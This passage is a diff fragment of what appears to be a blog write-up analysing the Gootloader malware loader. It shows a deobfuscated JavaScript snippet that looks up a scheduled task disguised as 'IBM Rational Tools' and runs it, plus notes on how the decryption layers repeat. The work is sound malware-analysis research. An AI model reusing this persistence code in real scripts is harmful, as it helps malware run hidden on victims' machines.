do0gra/do0gra.github.io/gootloader.md

 Schedule_Service_func_getFolder_GetTask = Schedule_Service_func_getFolder["GetTask"](IBM_Rational_Tools_str);
 Schedule_Service_func_getFolder_GetTask["RunEx"](null, 2, 0, "");
 ```

+The decryption of Decrypted_string using meeth0 produces the fourth layer.

-## Fourth Layer
+## Layer 4: Repetition of Previous Patterns

-Decrypted_string appears in the same format at the first layer.
-With partial strings assigned to random named variables and a few function declaractions
+Similar to Layer 1, this script sets up a new batch of randomly named variables and functions.
+The logic and structure remain consistent:
+* Variables contain fragments of obfuscated strings.
+* Functions handle decryption and data manipulation.

 Random named variables:
 ```js